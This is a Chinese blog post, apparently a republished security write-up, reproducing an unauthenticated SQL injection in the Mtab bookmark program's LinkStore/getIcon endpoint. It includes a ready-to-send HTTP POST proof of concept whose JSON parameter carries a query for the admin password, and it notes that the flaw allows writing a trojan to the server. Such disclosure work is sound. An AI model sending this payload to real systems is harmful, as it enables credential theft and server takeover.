博客
关于我
Mtab书签导航程序 LinkStore/getIcon SQL注入漏洞复现
阅读量:798 次
发布时间:2023-02-10

本文共 746 字,大约阅读时间需要 2 分钟。

Mtab书签导航程序安全审计报告

产品简介

Mtab书签导航程序是一款专注于网页和应用书签管理的免费浏览器插件。作为一款无广告的在线书签工具,它支持多端同步、美观易用的导航体验,旨在帮助用户高效管理网页和应用,提升在线浏览效率。

漏洞发现

在安全测试中,我们发现该程序的LinkStore/getIcon接口存在严重的SQL注入漏洞。该漏洞未经身份验证,攻击者可利用这一漏洞获取以下信息:

  • 数据库中的敏感信息,包括管理员后台密码和用户个人信息
  • 高权限权限下,可向服务器中写入木马程序,进一步获取系统权限

复现环境

  • 工具:使用常见的Web安全工具进行请求构造
  • 目标URL/LinkStore/getIcon
  • 请求方法:POST请求
  • 请求头
    Host: [目标域名]User-Agent: [模拟浏览器信息]
  • 内容类型:application/json

漏洞复现

通过对接口的仔细分析,我们成功构造了以下证明用例(PoC):

POST /LinkStore/getIcon HTTP/1.1Host: [目标域名]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Type: application/jsonConnection: Keep-alive{  "param": "SELECT `user`.`password` FROM `user` WHERE `username`= 'admin'"}

总结

该漏洞对系统安全性构成重大威胁,建议及时修复并升级相关接口安全性。

转载地址:http://ioffk.baihongyu.com/

你可能感兴趣的文章
springCloud整合RabbitMQ实现消息中间件
查看>>
pdo sqlserver
查看>>
SpringCloud实战(十一)-更优的分布式配置解决方案(Apollo)
查看>>
PDO中捕获SQL语句中的错误
查看>>
SCP和SFTP相同点和区别
查看>>
SpringCloudAlibaba中使用Sentinel实现熔断降级之熔断策略详解
查看>>
peek和pop的区别
查看>>
Pelemay 项目教程
查看>>
Penetration Testing、Security Testing、Automation Testing
查看>>
Pentaho业务分析平台 SQL注入漏洞复现
查看>>
PentestGPT:一款由ChatGPT驱动的强大渗透测试工具
查看>>
PeopleTools 8.54 first install note
查看>>
PEP 8016 获胜,成为新的 Python 社区治理方案
查看>>
PEP8规范
查看>>
PEPM Cookie 远程代码执行漏洞复现(XVE-2024-16919)
查看>>
Percona Server 5.6 安装TokuDB
查看>>
SpringBoot(十四)整合MyBatis
查看>>
percona-xtrabackup 备份
查看>>
Perfect,华为爆出 Redis 宝典,原来 Redis 性能可压榨到极致
查看>>
SpringBoot集成OpenOffice实现doc文档转html
查看>>